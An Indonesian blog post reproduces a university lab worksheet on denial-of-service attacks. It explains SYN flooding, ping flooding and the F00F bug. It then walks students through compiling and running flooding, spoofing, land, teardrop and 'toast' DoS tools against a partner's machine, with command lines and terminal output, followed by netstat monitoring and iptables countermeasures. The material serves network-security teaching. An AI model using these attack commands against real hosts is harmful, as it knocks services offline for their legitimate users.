Java Zone

Pemrograman java, Perulangan Java, Operator java, Thread Java, Makalah Filsafat Ilmu, Makalah Teologi dan lain lain

Powered by Blogger.

Apa Itu DOS dan Tipe Serangan DOS Attack Hacker

DoS dan Countermeasurenya


 

Apa itu DOS?


 

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu).


 

Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti hukum ini.


 

Beberapa contoh aktifitas DoS adalah:


 

1. Aktifitas 'flooding' terhadap suatu server.

2. Memutuskan koneksi antara 2 mesin.

3. Mencegah korban untuk dapat menggunakan layanan.

4. Merusak sistem agar korban tidak dapat menggunakan layanan


 

Tipe-tipe Serangan DOS

SYN-Flooding

SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.

Pentium 'FOOF' Bug

Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.

Ping Flooding

Ping Flooding adalah brute force Denial of Service sederhana. Jika dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing"


 

Pencegahan DoS

Selalu Up 2 Date.

Seperti contoh serangan diatas, SYN Flooding sangat efektif untuk Linux kernel 2.0.*. Dalam hal ini Linux kernel 2.0.30 keatas cukup handal untuk mengatasi serangan tersebut dikarenakan versi 2.0.30 memiliki option untuk menolak cracker untuk mengakses system.


 

Ikuti perkembangan security

Hal ini sangat efektif dalam mencegah pengerusakan sistem secara ilegal. Banyak admin malas untuk mengikuti issue-issue terbaru perkembangan dunia security. Dampak yang paling buruk, sistem cracker yang 'rajin', 'ulet' dan 'terlatih' akan sangat mudah untuk memasuki sistem dan merusak - tidak tertutup kemungkinan untuk melakukan Denial of Service -.

Menggunakan Firewall


 


 

  1. Dalam arp spoofing ada istilah yang disebut dengan arp cache poisoning, jelaskan dengan singkat apa itu arp cache poisoning !
  2. Carilah command untuk melakukan bloking terhadap ip spoofing menggunakan iptables.


 


 

PERCOBAAN


 

  1. Percobaan DoS dan Perilakunya
  • Bekerjalah dengan teman sebelah untuk melakukan percobaan ini, setiap kelompok minimal 2 orang. Satu berfungsi sebagai penyerang, satu berfungsi sebagai target.
  • Siapkan beberapa utility DoS, mintalah source pada dosen/asisten praktikum
  • Kompilasi dan jalankan beberapa tools yang sudah disiapkan dan komputer target jalankan ethereal. Analisa paket yang muncul dan berikan kesimpulan anda.
    • Jalankan langkah ini pada attacker
      • gcc pod_spoofing.c –o pod_spoofing
      • ./pod_spoofing ip_palsu ip_target
    • Pada komputer target lihat berapa besarnya koneksi jika menggunakan DoS
      • netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr


     

    • Jalankan langkah ini pada attacker
      • gcc syn_flood.c –o syn_flood
      • ./syn_flood ip_palsu ip_target port_awal port_akhir
    • Pada komputer target lihat berapa besarnya koneksi jika menggunakan DoS
      • netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr


     


     

    • Jalankan langkah ini pada attacker
      • gcc land_attack.c –o land_attack
      • ./land_attack –t ip_palsu –p no_port –c jumlah_paket
    • Pada komputer target lihat berapa besarnya koneksi jika menggunakan DoS
      • netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr


     


     

    • Jalankan langkah ini pada attacker
      • gcc teardrop+spoofing.c –o teardrop+spoofing
      • ./teardrop+spoofing ip_target ip_palsu –n jumlah_pengulangan
    • Pada komputer target lihat berapa besarnya koneksi jika menggunakan DoS
      • netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr


     

    Contoh cara menjalankan paket DoS

    pc1:/home/isbat/soft# ls

    land_attack pod_dos pod_spoofing syn_flood teardrop+spoofing

    Jika seperti ini

    pc1:/home/isbat/soft# ./pod_spoofing

    bash: ./pod_spoofing: Permission denied

    pc1:/home/isbat/soft# ls -l

    total 84

    -rw-r--r-- 1 isbat isbat 15529 2009-03-30 15:05 land_attack

    -rw-r--r-- 1 isbat isbat 13709 2009-03-30 15:05 pod_dos

    -rw-r--r-- 1 isbat isbat 13770 2009-03-30 15:05 pod_spoofing

    -rw-r--r-- 1 isbat isbat 15727 2009-03-30 15:05 syn_flood

    -rw-r--r-- 1 isbat isbat 18162 2009-03-30 15:05 teardrop+spoofing

    pc1:/home/isbat/soft# chmod +x *

    pc1:/home/isbat/soft# ls


     

    Cara menjalankan

    pc1:/home/isbat/soft# ./pod_spoofing

    usage: ./pod_spoofing <ip_palsu> <komputer_korban>

    pc1:/home/isbat/soft# ./pod_spoofing 10.10.10.10 10.252.44.164

    Dikirim ke 10.252.44.164

    Analisa ditarget dengan ethereal


     

    pc1:/home/isbat/soft# ./syn_flood

    gunakan: ./syn_flood <alamat palsu> <alamat korban> <port awal> <port_akhir>

    pc1:/home/isbat/soft# ./syn_flood 10.10.10.10 10.252.44.164 1 65000

    flooding. setiap detik = 25 paket .


     

    pc1:/home/isbat/soft# ./teardrop+spoofing

            teardrop atTack by . . .

    usage: ./teardrop+spoofing <IP_target> <IP_Spoofing> [-n repeats]

    pc1:/home/isbat/soft# ./teardrop+spoofing 10.252.44.164 10.10.10.10

            teardrop atTack by . . .

    packet terkirim ke target / korban:

    To: 10.252.44.164

    Repeats: 1

    10.252.44.164 [ (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) ]

        -all done-

    pc1:/home/isbat/soft# ./teardrop+spoofing 10.252.44.164 10.10.10.10 -n 10000

            teardrop atTack by . . .

    packet terkirim ke target / korban:

    To: 10.252.44.164

    Repeats: 10000

    10.252.44.164 [ (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^) (^_^)

    .....

  1. Jalankan toast sebagai Tools DoS dan cek lalu lintas data seperti praktikum 1, berikan kesimpulan anda perilaku DoS berdasar besarnya koneksi yang terjadi

    pens1:/home/isbat/toast# ./toast.sh 10.252.108.50 10.252.44.178 -s 9

    untitled folder 10

    ___________ __

    \__ ___/________ _______/ |_

    | | / _ \__ \ / ___/\ __\

    | |( <_> ) __ \_\___ \ | | untitled folder 10

    |____| \____(____ /____ > |__| untitled folder 10


     

    ______ ______ \/ \/

    | __ | |____ |

    | | | | ___| |

    | | | | | ____| By Gridmark

    | |__| | _ | |____

    |______| |_| |______|


     

    Attempting to find an remote open port...

    Throwing everything we got at 10.252.108.50

    Running 1234...

    Running DoS-Linux...

    Running ascend-foo...

    Running beer...

    Running biffit...


 

  1. Jalankan percobaan DoS pada percobaan 1 sebelumnya pada target jalankan tcpdump dan tulis ke file hasil tcpdump lalu capture data tcpdump dengan chaosreader baca index.html hasil chaosreader lihat perilaku DoS berdasarkan besarnya koneksi dan byte yang terkirim Bandingkan dengan hasil nestat.


 

  1. Jalankan kembali percobaan 1 tapi sebelumnya lakukan blocking dengan menggunakan iptables, apa yang terjadi.

    Blocking IP Penyerang

    iptables -I INPUT -s IP_Penyerang/netmask -j DROP


     

    Blocking Synflood

    iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT


     

    Blocking Ping of Death

    iptables -A INPUT -p icmp --icmp-type echo-request \

      -m limit --limit 1/s -i eth0 -j ACCEPT

    

  1. Buat Kesimpulan dari percobaan yang anda lakukan


 

Bagikan :
+
Previous
Next Post »
0 Komentar untuk "Apa Itu DOS dan Tipe Serangan DOS Attack Hacker"

 
Copyright © 2015 Java Zone - All Rights Reserved
Template By Kunci Dunia
Back To Top